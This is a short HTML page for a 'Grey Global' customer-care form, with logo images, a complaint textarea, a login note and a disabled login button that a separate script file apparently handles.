<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <link rel="shortcut icon" href="./grey-logo.png" type="image/x-icon">

  <title>Grey Global - Customer Care</title>
  <link rel="stylesheet" href="./style.css" />
</head>
<body>
  <div class="container">
    <div class="logo-section">
      <img src="grey-logo.png" alt="Grey Logo" class="logo" />
      <img src="customer-care.jpg" alt="Customer Care Logo" class="logo small" />
    </div>

    <div class="form-box">
      <h2>Welcome to Grey Global</h2>
      <p>Kindly write your complaint or request on the box below</p>

      <textarea placeholder="Write your complaint or request here..."></textarea><br>
      <br><br> <br><br> <br><br> <br><br> <br>
      <p class="note">
        Kindly log in to your Grey App to submit your complaint/request. Log in to continue
      </p>

      <button id="login-btn" disabled>Login to continue</button>
    </div>
  </div>

  <script src="./script.js"></script>
</body>
</html>
